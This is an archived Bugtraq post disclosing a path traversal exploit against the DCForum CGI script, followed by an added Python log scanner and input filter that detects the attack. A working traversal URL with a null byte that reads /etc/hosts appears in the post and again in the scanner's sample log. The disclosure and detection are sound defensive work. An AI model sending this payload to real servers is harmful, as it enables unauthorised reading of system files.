Bugtraq mailing list archives

DCForum Exploit (1.0 - 6.0)


From: SteeLe <SteeLe () PRIVACYX COM>
Date: Thu, 28 Dec 2000 10:26:01 -0500

Here's a working exploit; don't know why I sent a script. I guess it was for the lazy people, but anyway

simple exploitation:
http://localhost/dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/hosts%00


The vendor was contacted long ago by the original founder of this bug, CGISecurity.com. Before using the exploit, there is information you should read for side effects and other things. CGISecurity.com wrote an advisory, and it can be read at http://www.cgisecurity.com/advisory/2.txt

steeLe
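
A log check for the request shown in this post, added here as an example and not part of the original message or the advisory: it flags dcforum.cgi requests whose `forum` parameter decodes to a NUL byte, a `..` path segment, or an absolute path. The access-log format, the sample lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Dec/2000:10:30:01 -0500] "GET /dcforum/dcforum.cgi?az=list&forum=general HTTP/1.0" 200 5120',
    '192.0.2.44 - - [28/Dec/2000:10:31:17 -0500] "GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/hosts%00 HTTP/1.0" 200 310',
    '192.0.2.12 - - [28/Dec/2000:10:32:02 -0500] "GET /index.html HTTP/1.0" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so nested encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def forum_param_findings(raw_value):
    """Return the reasons a raw (still encoded) forum value looks hostile."""
    value = fully_decode(raw_value)
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("dot-dot-segment")
    if value.startswith(("/", "\\")):
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Yield (line_number, reasons) for suspicious dcforum.cgi requests."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.lower().endswith("/dcforum.cgi"):
            continue
        # Split the raw query by hand so decoding happens only in fully_decode.
        for pair in url.query.split("&"):
            key, _, raw = pair.partition("=")
            if key == "forum" and (r := forum_param_findings(raw)):
                yield n, r

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)}")
```

The same `forum_param_findings` check can sit in front of the CGI as an input filter, rejecting any request for which it returns a non-empty list.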
